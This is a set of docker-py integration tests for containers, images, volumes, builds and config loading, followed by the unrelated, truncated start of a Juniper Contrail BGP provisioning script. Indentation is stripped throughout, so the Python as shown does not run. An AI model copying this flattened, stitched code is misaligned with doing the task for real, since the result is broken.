exitcode = self.client.wait(id)
self.assertEqual(exitcode, 0)
diff = self.client.diff(id)
test_diff = [x for x in diff if x.get('Path', None) == '/test']
self.assertEqual(len(test_diff), 1)
self.assertIn('Kind', test_diff[0])
self.assertEqual(test_diff[0]['Kind'], 1)
class TestDiffWithDictInsteadOfId(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['touch', '/test'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
exitcode = self.client.wait(id)
self.assertEqual(exitcode, 0)
diff = self.client.diff(container)
test_diff = [x for x in diff if x.get('Path', None) == '/test']
self.assertEqual(len(test_diff), 1)
self.assertIn('Kind', test_diff[0])
self.assertEqual(test_diff[0]['Kind'], 1)
class TestStop(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['sleep', '9999'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
self.client.stop(id, timeout=2)
container_info = self.client.inspect_container(id)
self.assertIn('State', container_info)
state = container_info['State']
self.assertIn('ExitCode', state)
if exec_driver_is_native():
self.assertNotEqual(state['ExitCode'], 0)
self.assertIn('Running', state)
self.assertEqual(state['Running'], False)
class TestStopWithDictInsteadOfId(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['sleep', '9999'])
self.assertIn('Id', container)
id = container['Id']
self.client.start(container)
self.tmp_containers.append(id)
self.client.stop(container, timeout=2)
container_info = self.client.inspect_container(id)
self.assertIn('State', container_info)
state = container_info['State']
self.assertIn('ExitCode', state)
if exec_driver_is_native():
self.assertNotEqual(state['ExitCode'], 0)
self.assertIn('Running', state)
self.assertEqual(state['Running'], False)
class TestKill(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['sleep', '9999'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
self.client.kill(id)
container_info = self.client.inspect_container(id)
self.assertIn('State', container_info)
state = container_info['State']
self.assertIn('ExitCode', state)
if exec_driver_is_native():
self.assertNotEqual(state['ExitCode'], 0)
self.assertIn('Running', state)
self.assertEqual(state['Running'], False)
class TestKillWithDictInsteadOfId(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['sleep', '9999'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
self.client.kill(container)
container_info = self.client.inspect_container(id)
self.assertIn('State', container_info)
state = container_info['State']
self.assertIn('ExitCode', state)
if exec_driver_is_native():
self.assertNotEqual(state['ExitCode'], 0)
self.assertIn('Running', state)
self.assertEqual(state['Running'], False)
class TestKillWithSignal(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['sleep', '60'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
self.client.kill(id, signal=signal.SIGKILL)
exitcode = self.client.wait(id)
self.assertNotEqual(exitcode, 0)
container_info = self.client.inspect_container(id)
self.assertIn('State', container_info)
state = container_info['State']
self.assertIn('ExitCode', state)
self.assertNotEqual(state['ExitCode'], 0)
self.assertIn('Running', state)
self.assertEqual(state['Running'], False, state)
class TestPort(BaseTestCase):
def runTest(self):
port_bindings = {
'1111': ('127.0.0.1', '4567'),
'2222': ('127.0.0.1', '4568')
}
container = self.client.create_container(
'busybox', ['sleep', '60'], ports=list(port_bindings.keys()),
host_config=self.client.create_host_config(
port_bindings=port_bindings, network_mode='bridge'
)
)
id = container['Id']
self.client.start(container)
# Call the port function on each binding and compare expected vs. actual
for port in port_bindings:
actual_bindings = self.client.port(container, port)
port_binding = actual_bindings.pop()
ip, host_port = port_binding['HostIp'], port_binding['HostPort']
self.assertEqual(ip, port_bindings[port][0])
self.assertEqual(host_port, port_bindings[port][1])
self.client.kill(id)
class TestMacAddress(BaseTestCase):
def runTest(self):
mac_address_expected = "02:42:ac:11:00:0a"
container = self.client.create_container(
'busybox', ['sleep', '60'], mac_address=mac_address_expected)
id = container['Id']
self.client.start(container)
res = self.client.inspect_container(container['Id'])
self.assertEqual(mac_address_expected,
res['NetworkSettings']['MacAddress'])
self.client.kill(id)
class TestRestart(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['sleep', '9999'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
info = self.client.inspect_container(id)
self.assertIn('State', info)
self.assertIn('StartedAt', info['State'])
start_time1 = info['State']['StartedAt']
self.client.restart(id, timeout=2)
info2 = self.client.inspect_container(id)
self.assertIn('State', info2)
self.assertIn('StartedAt', info2['State'])
start_time2 = info2['State']['StartedAt']
self.assertNotEqual(start_time1, start_time2)
self.assertIn('Running', info2['State'])
self.assertEqual(info2['State']['Running'], True)
self.client.kill(id)
class TestRestartWithDictInsteadOfId(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['sleep', '9999'])
self.assertIn('Id', container)
id = container['Id']
self.client.start(container)
self.tmp_containers.append(id)
info = self.client.inspect_container(id)
self.assertIn('State', info)
self.assertIn('StartedAt', info['State'])
start_time1 = info['State']['StartedAt']
self.client.restart(container, timeout=2)
info2 = self.client.inspect_container(id)
self.assertIn('State', info2)
self.assertIn('StartedAt', info2['State'])
start_time2 = info2['State']['StartedAt']
self.assertNotEqual(start_time1, start_time2)
self.assertIn('Running', info2['State'])
self.assertEqual(info2['State']['Running'], True)
self.client.kill(id)
class TestRemoveContainer(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['true'])
id = container['Id']
self.client.start(id)
self.client.wait(id)
self.client.remove_container(id)
containers = self.client.containers(all=True)
res = [x for x in containers if 'Id' in x and x['Id'].startswith(id)]
self.assertEqual(len(res), 0)
class TestRemoveContainerWithDictInsteadOfId(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['true'])
id = container['Id']
self.client.start(id)
self.client.wait(id)
self.client.remove_container(container)
containers = self.client.containers(all=True)
res = [x for x in containers if 'Id' in x and x['Id'].startswith(id)]
self.assertEqual(len(res), 0)
class TestCreateContainerWithVolumesFrom(BaseTestCase):
def runTest(self):
vol_names = ['foobar_vol0', 'foobar_vol1']
res0 = self.client.create_container(
'busybox', 'true', name=vol_names[0]
)
container1_id = res0['Id']
self.tmp_containers.append(container1_id)
self.client.start(container1_id)
res1 = self.client.create_container(
'busybox', 'true', name=vol_names[1]
)
container2_id = res1['Id']
self.tmp_containers.append(container2_id)
self.client.start(container2_id)
with self.assertRaises(docker.errors.DockerException):
self.client.create_container(
'busybox', 'cat', detach=True, stdin_open=True,
volumes_from=vol_names
)
res2 = self.client.create_container(
'busybox', 'cat', detach=True, stdin_open=True,
host_config=self.client.create_host_config(
volumes_from=vol_names, network_mode='none'
)
)
container3_id = res2['Id']
self.tmp_containers.append(container3_id)
self.client.start(container3_id)
info = self.client.inspect_container(res2['Id'])
self.assertCountEqual(info['HostConfig']['VolumesFrom'], vol_names)
class TestCreateContainerWithLinks(BaseTestCase):
def runTest(self):
res0 = self.client.create_container(
'busybox', 'cat',
detach=True, stdin_open=True,
environment={'FOO': '1'})
container1_id = res0['Id']
self.tmp_containers.append(container1_id)
self.client.start(container1_id)
res1 = self.client.create_container(
'busybox', 'cat',
detach=True, stdin_open=True,
environment={'FOO': '1'})
container2_id = res1['Id']
self.tmp_containers.append(container2_id)
self.client.start(container2_id)
# we don't want the first /
link_path1 = self.client.inspect_container(container1_id)['Name'][1:]
link_alias1 = 'mylink1'
link_env_prefix1 = link_alias1.upper()
link_path2 = self.client.inspect_container(container2_id)['Name'][1:]
link_alias2 = 'mylink2'
link_env_prefix2 = link_alias2.upper()
res2 = self.client.create_container(
'busybox', 'env', host_config=self.client.create_host_config(
links={link_path1: link_alias1, link_path2: link_alias2},
network_mode='none'
)
)
container3_id = res2['Id']
self.tmp_containers.append(container3_id)
self.client.start(container3_id)
self.assertEqual(self.client.wait(container3_id), 0)
logs = self.client.logs(container3_id)
if six.PY3:
logs = logs.decode('utf-8')
self.assertIn('{0}_NAME='.format(link_env_prefix1), logs)
self.assertIn('{0}_ENV_FOO=1'.format(link_env_prefix1), logs)
self.assertIn('{0}_NAME='.format(link_env_prefix2), logs)
self.assertIn('{0}_ENV_FOO=1'.format(link_env_prefix2), logs)
class TestRestartingContainer(BaseTestCase):
def runTest(self):
container = self.client.create_container(
'busybox', ['sleep', '2'],
host_config=self.client.create_host_config(
restart_policy={"Name": "always", "MaximumRetryCount": 0},
network_mode='none'
)
)
id = container['Id']
self.client.start(id)
self.client.wait(id)
with self.assertRaises(docker.errors.APIError) as exc:
self.client.remove_container(id)
err = exc.exception.response.text
self.assertIn(
'You cannot remove a running container', err
)
self.client.remove_container(id, force=True)
class TestExecuteCommand(BaseTestCase):
def runTest(self):
if not exec_driver_is_native():
pytest.skip('Exec driver not native')
container = self.client.create_container('busybox', 'cat',
detach=True, stdin_open=True)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.exec_create(id, ['echo', 'hello'])
self.assertIn('Id', res)
exec_log = self.client.exec_start(res)
self.assertEqual(exec_log, b'hello\n')
class TestExecuteCommandString(BaseTestCase):
def runTest(self):
if not exec_driver_is_native():
pytest.skip('Exec driver not native')
container = self.client.create_container('busybox', 'cat',
detach=True, stdin_open=True)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.exec_create(id, 'echo hello world')
self.assertIn('Id', res)
exec_log = self.client.exec_start(res)
self.assertEqual(exec_log, b'hello world\n')
class TestExecuteCommandStringAsUser(BaseTestCase):
def runTest(self):
if not exec_driver_is_native():
pytest.skip('Exec driver not native')
container = self.client.create_container('busybox', 'cat',
detach=True, stdin_open=True)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.exec_create(id, 'whoami', user='default')
self.assertIn('Id', res)
exec_log = self.client.exec_start(res)
self.assertEqual(exec_log, b'default\n')
class TestExecuteCommandStringAsRoot(BaseTestCase):
def runTest(self):
if not exec_driver_is_native():
pytest.skip('Exec driver not native')
container = self.client.create_container('busybox', 'cat',
detach=True, stdin_open=True)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.exec_create(id, 'whoami')
self.assertIn('Id', res)
exec_log = self.client.exec_start(res)
self.assertEqual(exec_log, b'root\n')
class TestExecuteCommandStreaming(BaseTestCase):
def runTest(self):
if not exec_driver_is_native():
pytest.skip('Exec driver not native')
container = self.client.create_container('busybox', 'cat',
detach=True, stdin_open=True)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
exec_id = self.client.exec_create(id, ['echo', 'hello\nworld'])
self.assertIn('Id', exec_id)
res = b''
for chunk in self.client.exec_start(exec_id, stream=True):
res += chunk
self.assertEqual(res, b'hello\nworld\n')
class TestExecInspect(BaseTestCase):
def runTest(self):
if not exec_driver_is_native():
pytest.skip('Exec driver not native')
container = self.client.create_container('busybox', 'cat',
detach=True, stdin_open=True)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
exec_id = self.client.exec_create(id, ['mkdir', '/does/not/exist'])
self.assertIn('Id', exec_id)
self.client.exec_start(exec_id)
exec_info = self.client.exec_inspect(exec_id)
self.assertIn('ExitCode', exec_info)
self.assertNotEqual(exec_info['ExitCode'], 0)
class TestRunContainerStreaming(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', '/bin/sh',
detach=True, stdin_open=True)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
sock = self.client.attach_socket(container, ws=False)
self.assertTrue(sock.fileno() > -1)
class TestPauseUnpauseContainer(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['sleep', '9999'])
id = container['Id']
self.tmp_containers.append(id)
self.client.start(container)
self.client.pause(id)
container_info = self.client.inspect_container(id)
self.assertIn('State', container_info)
state = container_info['State']
self.assertIn('ExitCode', state)
self.assertEqual(state['ExitCode'], 0)
self.assertIn('Running', state)
self.assertEqual(state['Running'], True)
self.assertIn('Paused', state)
self.assertEqual(state['Paused'], True)
self.client.unpause(id)
container_info = self.client.inspect_container(id)
self.assertIn('State', container_info)
state = container_info['State']
self.assertIn('ExitCode', state)
self.assertEqual(state['ExitCode'], 0)
self.assertIn('Running', state)
self.assertEqual(state['Running'], True)
self.assertIn('Paused', state)
self.assertEqual(state['Paused'], False)
class TestCreateContainerWithHostPidMode(BaseTestCase):
def runTest(self):
ctnr = self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
pid_mode='host', network_mode='none'
)
)
self.assertIn('Id', ctnr)
self.tmp_containers.append(ctnr['Id'])
self.client.start(ctnr)
inspect = self.client.inspect_container(ctnr)
self.assertIn('HostConfig', inspect)
host_config = inspect['HostConfig']
self.assertIn('PidMode', host_config)
self.assertEqual(host_config['PidMode'], 'host')
#################
# LINKS TESTS #
#################
class TestRemoveLink(BaseTestCase):
def runTest(self):
# Create containers
container1 = self.client.create_container(
'busybox', 'cat', detach=True, stdin_open=True
)
container1_id = container1['Id']
self.tmp_containers.append(container1_id)
self.client.start(container1_id)
# Create Link
# we don't want the first /
link_path = self.client.inspect_container(container1_id)['Name'][1:]
link_alias = 'mylink'
container2 = self.client.create_container(
'busybox', 'cat', host_config=self.client.create_host_config(
links={link_path: link_alias}, network_mode='none'
)
)
container2_id = container2['Id']
self.tmp_containers.append(container2_id)
self.client.start(container2_id)
# Remove link
linked_name = self.client.inspect_container(container2_id)['Name'][1:]
link_name = '%s/%s' % (linked_name, link_alias)
self.client.remove_container(link_name, link=True)
# Link is gone
containers = self.client.containers(all=True)
retrieved = [x for x in containers if link_name in x['Names']]
self.assertEqual(len(retrieved), 0)
# Containers are still there
retrieved = [
x for x in containers if x['Id'].startswith(container1_id) or
x['Id'].startswith(container2_id)
]
self.assertEqual(len(retrieved), 2)
##################
# IMAGES TESTS #
##################
class TestPull(BaseTestCase):
def runTest(self):
try:
self.client.remove_image('hello-world')
except docker.errors.APIError:
pass
res = self.client.pull('hello-world')
self.tmp_imgs.append('hello-world')
self.assertEqual(type(res), six.text_type)
self.assertGreaterEqual(
len(self.client.images('hello-world')), 1
)
img_info = self.client.inspect_image('hello-world')
self.assertIn('Id', img_info)
class TestPullStream(BaseTestCase):
def runTest(self):
try:
self.client.remove_image('hello-world')
except docker.errors.APIError:
pass
stream = self.client.pull('hello-world', stream=True)
self.tmp_imgs.append('hello-world')
for chunk in stream:
if six.PY3:
chunk = chunk.decode('utf-8')
json.loads(chunk) # ensure chunk is a single, valid JSON blob
self.assertGreaterEqual(
len(self.client.images('hello-world')), 1
)
img_info = self.client.inspect_image('hello-world')
self.assertIn('Id', img_info)
class TestCommit(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['touch', '/test'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.commit(id)
self.assertIn('Id', res)
img_id = res['Id']
self.tmp_imgs.append(img_id)
img = self.client.inspect_image(img_id)
self.assertIn('Container', img)
self.assertTrue(img['Container'].startswith(id))
self.assertIn('ContainerConfig', img)
self.assertIn('Image', img['ContainerConfig'])
self.assertEqual('busybox', img['ContainerConfig']['Image'])
busybox_id = self.client.inspect_image('busybox')['Id']
self.assertIn('Parent', img)
self.assertEqual(img['Parent'], busybox_id)
class TestRemoveImage(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['touch', '/test'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.commit(id)
self.assertIn('Id', res)
img_id = res['Id']
self.tmp_imgs.append(img_id)
self.client.remove_image(img_id, force=True)
images = self.client.images(all=True)
res = [x for x in images if x['Id'].startswith(img_id)]
self.assertEqual(len(res), 0)
##################
# IMPORT TESTS #
##################
class ImportTestCase(BaseTestCase):
'''Base class for `docker import` test cases.'''
TAR_SIZE = 512 * 1024
def write_dummy_tar_content(self, n_bytes, tar_fd):
def extend_file(f, n_bytes):
f.seek(n_bytes - 1)
f.write(bytearray([65]))
f.seek(0)
tar = tarfile.TarFile(fileobj=tar_fd, mode='w')
with tempfile.NamedTemporaryFile() as f:
extend_file(f, n_bytes)
tarinfo = tar.gettarinfo(name=f.name, arcname='testdata')
tar.addfile(tarinfo, fileobj=f)
tar.close()
@contextlib.contextmanager
def dummy_tar_stream(self, n_bytes):
'''Yields a stream that is valid tar data of size n_bytes.'''
with tempfile.NamedTemporaryFile() as tar_file:
self.write_dummy_tar_content(n_bytes, tar_file)
tar_file.seek(0)
yield tar_file
@contextlib.contextmanager
def dummy_tar_file(self, n_bytes):
'''Yields the name of a valid tar file of size n_bytes.'''
with tempfile.NamedTemporaryFile() as tar_file:
self.write_dummy_tar_content(n_bytes, tar_file)
tar_file.seek(0)
yield tar_file.name
class TestImportFromBytes(ImportTestCase):
'''Tests importing an image from in-memory byte data.'''
def runTest(self):
with self.dummy_tar_stream(n_bytes=500) as f:
content = f.read()
# The generic import_image() function cannot import in-memory bytes
# data that happens to be represented as a string type, because
# import_image() will try to use it as a filename and usually then
# trigger an exception. So we test the import_image_from_data()
# function instead.
statuses = self.client.import_image_from_data(
content, repository='test/import-from-bytes')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
self.assertNotIn('error', result)
img_id = result['status']
self.tmp_imgs.append(img_id)
class TestImportFromFile(ImportTestCase):
'''Tests importing an image from a tar file on disk.'''
def runTest(self):
with self.dummy_tar_file(n_bytes=self.TAR_SIZE) as tar_filename:
# statuses = self.client.import_image(
# src=tar_filename, repository='test/import-from-file')
statuses = self.client.import_image_from_file(
tar_filename, repository='test/import-from-file')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
self.assertNotIn('error', result)
self.assertIn('status', result)
img_id = result['status']
self.tmp_imgs.append(img_id)
class TestImportFromStream(ImportTestCase):
'''Tests importing an image from a stream containing tar data.'''
def runTest(self):
with self.dummy_tar_stream(n_bytes=self.TAR_SIZE) as tar_stream:
statuses = self.client.import_image(
src=tar_stream, repository='test/import-from-stream')
# statuses = self.client.import_image_from_stream(
# tar_stream, repository='test/import-from-stream')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
self.assertNotIn('error', result)
self.assertIn('status', result)
img_id = result['status']
self.tmp_imgs.append(img_id)
class TestImportFromURL(ImportTestCase):
'''Tests downloading an image over HTTP.'''
@contextlib.contextmanager
def temporary_http_file_server(self, stream):
'''Serve data from an IO stream over HTTP.'''
class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-Type', 'application/x-tar')
self.end_headers()
shutil.copyfileobj(stream, self.wfile)
server = socketserver.TCPServer(('', 0), Handler)
thread = threading.Thread(target=server.serve_forever)
thread.setDaemon(True)
thread.start()
yield 'http://%s:%s' % (socket.gethostname(), server.server_address[1])
server.shutdown()
@pytest.mark.skipif(True, reason="Doesn't work inside a container - FIXME")
def runTest(self):
# The crappy test HTTP server doesn't handle large files well, so use
# a small file.
TAR_SIZE = 10240
with self.dummy_tar_stream(n_bytes=TAR_SIZE) as tar_data:
with self.temporary_http_file_server(tar_data) as url:
statuses = self.client.import_image(
src=url, repository='test/import-from-url')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
self.assertNotIn('error', result)
self.assertIn('status', result)
img_id = result['status']
self.tmp_imgs.append(img_id)
#################
# VOLUMES TESTS #
#################
@requires_api_version('1.21')
class TestVolumes(BaseTestCase):
def test_create_volume(self):
name = 'perfectcherryblossom'
self.tmp_volumes.append(name)
result = self.client.create_volume(name)
self.assertIn('Name', result)
self.assertEqual(result['Name'], name)
self.assertIn('Driver', result)
self.assertEqual(result['Driver'], 'local')
def test_create_volume_invalid_driver(self):
driver_name = 'invalid.driver'
with pytest.raises(docker.errors.NotFound):
self.client.create_volume('perfectcherryblossom', driver_name)
def test_list_volumes(self):
name = 'imperishablenight'
self.tmp_volumes.append(name)
volume_info = self.client.create_volume(name)
result = self.client.volumes()
self.assertIn('Volumes', result)
volumes = result['Volumes']
self.assertIn(volume_info, volumes)
def test_inspect_volume(self):
name = 'embodimentofscarletdevil'
self.tmp_volumes.append(name)
volume_info = self.client.create_volume(name)
result = self.client.inspect_volume(name)
self.assertEqual(volume_info, result)
def test_inspect_nonexistent_volume(self):
name = 'embodimentofscarletdevil'
with pytest.raises(docker.errors.NotFound):
self.client.inspect_volume(name)
def test_remove_volume(self):
name = 'shootthebullet'
self.tmp_volumes.append(name)
self.client.create_volume(name)
result = self.client.remove_volume(name)
self.assertTrue(result)
def test_remove_nonexistent_volume(self):
name = 'shootthebullet'
with pytest.raises(docker.errors.NotFound):
self.client.remove_volume(name)
#################
# BUILDER TESTS #
#################
class TestBuild(BaseTestCase):
def runTest(self):
if compare_version(self.client._version, '1.8') < 0:
return
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
img, logs = self.client.build(fileobj=script)
self.assertNotEqual(img, None)
self.assertNotEqual(img, '')
self.assertNotEqual(logs, '')
container1 = self.client.create_container(img, 'test -d /tmp/test')
id1 = container1['Id']
self.client.start(id1)
self.tmp_containers.append(id1)
exitcode1 = self.client.wait(id1)
self.assertEqual(exitcode1, 0)
container2 = self.client.create_container(img, 'test -d /tmp/test')
id2 = container2['Id']
self.client.start(id2)
self.tmp_containers.append(id2)
exitcode2 = self.client.wait(id2)
self.assertEqual(exitcode2, 0)
self.tmp_imgs.append(img)
class TestBuildStream(BaseTestCase):
def runTest(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
stream = self.client.build(fileobj=script, stream=True)
logs = ''
for chunk in stream:
if six.PY3:
chunk = chunk.decode('utf-8')
json.loads(chunk) # ensure chunk is a single, valid JSON blob
logs += chunk
self.assertNotEqual(logs, '')
class TestBuildFromStringIO(BaseTestCase):
def runTest(self):
if six.PY3:
return
script = io.StringIO(six.text_type('\n').join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]))
stream = self.client.build(fileobj=script, stream=True)
logs = ''
for chunk in stream:
if six.PY3:
chunk = chunk.decode('utf-8')
logs += chunk
self.assertNotEqual(logs, '')
class TestBuildWithDockerignore(Cleanup, BaseTestCase):
def runTest(self):
if compare_version(self.client._version, '1.8') >= 0:
return
base_dir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base_dir)
with open(os.path.join(base_dir, 'Dockerfile'), 'w') as f:
f.write("\n".join([
'FROM busybox',
'MAINTAINER docker-py',
'ADD . /test',
]))
with open(os.path.join(base_dir, '.dockerignore'), 'w') as f:
f.write("\n".join([
'ignored',
'Dockerfile',
'.dockerignore',
'', # empty line
]))
with open(os.path.join(base_dir, 'not-ignored'), 'w') as f:
f.write("this file should not be ignored")
subdir = os.path.join(base_dir, 'ignored', 'subdir')
os.makedirs(subdir)
with open(os.path.join(subdir, 'file'), 'w') as f:
f.write("this file should be ignored")
tag = 'docker-py-test-build-with-dockerignore'
stream = self.client.build(
path=base_dir,
tag=tag,
)
for chunk in stream:
pass
c = self.client.create_container(tag, ['ls', '-1A', '/test'])
self.client.start(c)
self.client.wait(c)
logs = self.client.logs(c)
if six.PY3:
logs = logs.decode('utf-8')
self.assertEqual(
list(filter(None, logs.split('\n'))),
['not-ignored'],
)
#######################
# PY SPECIFIC TESTS #
#######################
class TestRunShlex(BaseTestCase):
def runTest(self):
commands = [
'true',
'echo "The Young Descendant of Tepes & Septette for the '
'Dead Princess"',
'echo -n "The Young Descendant of Tepes & Septette for the '
'Dead Princess"',
'/bin/sh -c "echo Hello World"',
'/bin/sh -c \'echo "Hello World"\'',
'echo "\"Night of Nights\""',
'true && echo "Night of Nights"'
]
for cmd in commands:
container = self.client.create_container('busybox', cmd)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
exitcode = self.client.wait(id)
self.assertEqual(exitcode, 0, msg=cmd)
class TestLoadConfig(BaseTestCase):
def runTest(self):
folder = tempfile.mkdtemp()
self.tmp_folders.append(folder)
cfg_path = os.path.join(folder, '.dockercfg')
f = open(cfg_path, 'w')
auth_ = base64.b64encode(b'sakuya:izayoi').decode('ascii')
f.write('auth = {0}\n'.format(auth_))
f.write('email = [email protected]')
f.close()
cfg = docker.auth.load_config(cfg_path)
self.assertNotEqual(cfg[docker.auth.INDEX_NAME], None)
cfg = cfg[docker.auth.INDEX_NAME]
self.assertEqual(cfg['username'], 'sakuya')
self.assertEqual(cfg['password'], 'izayoi')
self.assertEqual(cfg['email'], '[email protected]')
self.assertEqual(cfg.get('Auth'), None)
class TestLoadJSONConfig(BaseTestCase):
def runTest(self):
folder = tempfile.mkdtemp()
self.tmp_folders.append(folder)
cfg_path = os.path.join(folder, '.dockercfg')
f = open(cfg_path, 'w')
auth_ = base64.b64encode(b'sakuya:izayoi').decode('ascii')
email_ = '[email protected]'
f.write('{{"{0}": {{"auth": "{1}", "email": "{2}"}}}}\n'.format(
docker.auth.INDEX_URL, auth_, email_))
f.close()
cfg = docker.auth.load_config(cfg_path)
self.assertNotEqual(cfg[docker.auth.INDEX_URL], None)
cfg = cfg[docker.auth.INDEX_URL]
self.assertEqual(cfg['username'], 'sakuya')
self.assertEqual(cfg['password'], 'izayoi')
self.assertEqual(cfg['email'], '[email protected]')
self.assertEqual(cfg.get('Auth'), None)
class TestAutoDetectVersion(unittest.TestCase):
def test_client_init(self):
client = docker_client(version='auto')
client_version = client._version
api_version = client.version(api_version=False)['ApiVersion']
self.assertEqual(client_version, api_version)
api_version_2 = client.version()['ApiVersion']
self.assertEqual(client_version, api_version_2)
client.close()
def test_auto_client(self):
client = docker.AutoVersionClient(**docker_client_kwargs())
client_version = client._version
api_version = client.version(api_version=False)['ApiVersion']
self.assertEqual(client_version, api_version)
api_version_2 = client.version()['ApiVersion']
self.assertEqual(client_version, api_version_2)
client.close()
with self.assertRaises(docker.errors.DockerException):
docker.AutoVersionClient(**docker_client_kwargs(version='1.11'))
class TestConnectionTimeout(unittest.TestCase):
def setUp(self):
self.timeout = 0.5
self.client = docker.client.Client(base_url='http://192.168.10.2:4243',
timeout=self.timeout)
def runTest(self):
start = time.time()
res = None
# This call isn't supposed to complete, and it should fail fast.
try:
res = self.client.inspect_container('id')
except:
pass
end = time.time()
self.assertTrue(res is None)
self.assertTrue(end - start < 2 * self.timeout)
class UnixconnTestCase(unittest.TestCase):
"""
Test UNIX socket connection adapter.
"""
def test_resource_warnings(self):
"""
Test no warnings are produced when using the client.
"""
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
client = docker_client()
client.images()
client.close()
del client
assert len(w) == 0, \
"No warnings produced: {0}".format(w[0].message)
####################
# REGRESSION TESTS #
####################
class TestRegressions(BaseTestCase):
def test_443(self):
dfile = io.BytesIO()
with self.assertRaises(docker.errors.APIError) as exc:
for line in self.client.build(fileobj=dfile, tag="a/b/c"):
pass
self.assertEqual(exc.exception.response.status_code, 500)
dfile.close()
def test_542(self):
self.client.start(
self.client.create_container('busybox', ['true'])
)
result = self.client.containers(all=True, trunc=True)
self.assertEqual(len(result[0]['Id']), 12)
def test_647(self):
with self.assertRaises(docker.errors.APIError):
self.client.inspect_image('gensokyo.jp//kirisame')
def test_649(self):
self.client.timeout = None
ctnr = self.client.create_container('busybox', ['sleep', '2'])
self.client.start(ctnr)
self.client.stop(ctnr)
def test_715(self):
ctnr = self.client.create_container('busybox', ['id', '-u'], user=1000)
self.client.start(ctnr)
self.client.wait(ctnr)
logs = self.client.logs(ctnr)
if six.PY3:
logs = logs.decode('utf-8')
assert logs == '1000\n'
|
|
#!/usr/bin/python
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
import sys
import argparse
import ConfigParser
from provision_bgp import BgpProvisioner
from vnc_api.vnc_api import *
from vnc_admin_api import VncApiAdmin
class ControlProvisioner(object):
def __init__(self, args_str=None):
self._args = None
if not args_str:
args_str = ' '.join(sys.argv[1:])
self._parse_args(args_str)
if self._args.peer_list:
peer_list = self._args.peer_list.split(',')
else:
peer_list = None
if self._args.router_asn and not self._args.oper:
self._vnc_lib = VncApiAdmin(
self._args.use_admin_api,
self._args.admin_user, self._args.admin_password,
self._args.admin_tenant_name,
self._args.api_server_ip,
self._args.api_server_port, '/',
api_server_use_ssl=self._args.api_server_use_ssl)
# Update global system config also with this ASN
gsc_obj = self._vnc_lib.global_system_config_read(
fq_name=['default-global-system-config'])
gsc_obj.set_autonomous_system(self._args.router_asn)
if self._args.ibgp_auto_mesh is not None:
gsc_obj.set_ibgp_auto_mesh(self._args.ibgp_auto_mesh)
            if self._args.set_graceful_restart_parameters:
gr_params = GracefulRestartParametersType()
gr_params.set_restart_time(
int(self._args.graceful_restart_time))
gr_params.set_long_lived_restart_time(
int(self._args.long_lived_graceful_restart_time))
gr_params.set_end_of_rib_timeout(
int(self._args.end_of_rib_timeout))
gr_params.set_enable(self._args.graceful_restart_enable)
gr_params.set_bgp_helper_enable(
self._args.graceful_restart_bgp_helper_enable)
gr_params.set_xmpp_helper_enable(
self._args.graceful_restart_xmpp_helper_enable)
gsc_obj.set_graceful_restart_parameters(gr_params)
self._vnc_lib.global_system_config_update(gsc_obj)
return
bp_obj = BgpProvisioner(
self._args.admin_user, self._args.admin_password,
self._args.admin_tenant_name,
self._args.api_server_ip, self._args.api_server_port,
api_server_use_ssl=self._args.api_server_use_ssl,
use_admin_api=self._args.use_admin_api,
sub_cluster_name=self._args.sub_cluster_name,
peer_list=peer_list)
if self._args.oper == 'add':
if self._args.sub_cluster_name:
bp_obj.add_bgp_router('external-control-node',
self._args.host_name,
self._args.host_ip, self._args.router_asn,
self._args.address_families, self._args.md5,
